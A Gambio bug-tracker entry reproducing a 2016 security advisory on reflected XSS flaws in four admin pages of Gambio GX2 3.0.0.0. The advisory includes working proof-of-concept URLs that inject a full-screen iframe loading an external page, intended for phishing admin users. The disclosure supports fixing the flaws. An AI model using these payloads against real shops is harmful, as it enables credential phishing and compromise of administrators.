GX-Bug #47148: Allgemeine Sicherheitsmaßnahmen im Adminbereich (vielen Dank an Heiko Frenzel von doo!media) - GX-Entwicklung - Gambio GmbH Projektmanagement

GX-Bug #47148

Von Daniel Würdemann vor mehr als 8 Jahren aktualisiert

Title: Multiple XSS (possible authenticated backend phishing attack) 

 Software: Gambio GX2  
 Version: 3.0.0.0 
 Vendor: Gambio GmbH (www.gambio.de) 
 Date: 23/06/2016 
 Credits / Author: Heiko Frenzel (www.heiko-frenzel.de) 

 Description: 
 Gambio GX2 3.0.0.0 is vulnerable to XSS attacks meaning that if an admin user can be tricked to visit a crafted URL created by attacker, the attacker is able to use phishing methods (fake login form via iframe / external content) or could compromise the admin computer by using exploits.  
 ____________________________________________________________ 
 ____________________________________________________________ 



 1. #1 XSS 
 `Exploit: ________________________________________________________  
 Exploit: HOST/admin/customers.php?xss=[XSS] 
 PoC: HOST/admin/customers.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 2. src="http://www.sicherheit-online.org/xternal/storm.html"> 
 ____________________________________________________________ 


 #2 XSS 
 `Exploit: ________________________________________________________  
 Exploit: HOST/admin/categories.php?xss=[XSS] 
 PoC: HOST/admin/categories.php?xss="></a></td></tr></table><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 3. src="http://www.sicherheit-online.org/xternal/storm.html"> 
 ____________________________________________________________ 


 #3 XSS 
 `Exploit: ________________________________________________________  
 Exploit: HOST/admin/specials.php?xss=[XSS] 
 PoC: HOST/admin/specials.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` 

 4. src="http://www.sicherheit-online.org/xternal/storm.html"> 
 ____________________________________________________________ 


 #4 XSS 
 `Exploit: ________________________________________________________  
 Exploit: HOST/admin/orders.php?xss=[XSS] 
 PoC: HOST/admin/orders.php?xss=xxx"></form><iframe style="position:fixed;top:0;left:0;width:100%;min-height:700px;height:100%;" src="http://www.sicherheit-online.org/xternal/storm.html">` src="http://www.sicherheit-online.org/xternal/storm.html">

Zurück

Projekt

Allgemein

Profil

GX-Entwicklung

GX-Bug #47148